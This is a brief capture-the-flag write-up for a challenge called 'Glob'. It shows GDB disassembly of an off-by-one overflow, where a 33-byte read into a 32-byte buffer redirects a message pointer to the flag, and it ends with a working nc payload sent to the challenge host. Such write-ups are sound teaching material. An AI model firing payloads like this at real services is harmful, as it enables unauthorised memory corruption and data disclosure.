Glob¶
GDB -> disas main:
.
.
0x00000000004012ba <+104>: call 0x4010c0 <printf@plt>
0x00000000004012bf <+109>: lea rax,[rip+0x2dda] # 0x4040a0 <program_data+32>
0x00000000004012c6 <+116>: mov QWORD PTR [rip+0x2df3],rax # 0x4040c0 <program_data+64>
0x00000000004012cd <+123>: mov edx,0x21
0x00000000004012d2 <+128>: lea rax,[rip+0x2dc7] # 0x4040a0 <program_data+32>
0x00000000004012d9 <+135>: mov rsi,rax
0x00000000004012dc <+138>: mov edi,0x0
0x00000000004012e1 <+143>: call 0x4010d0 <read@plt>
.
.
program_data.message is at 0x4040c0 \
program_data.username is at 0x4040a0 \
program_data.flag must be at 0x404080
The read() accepts 33 bytes but username[] is just 32 bytes, so 1 byte of message can be overwritten so that it points to flag[]:
echo -n -e "hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh\x80" | nc rivit.dev 10022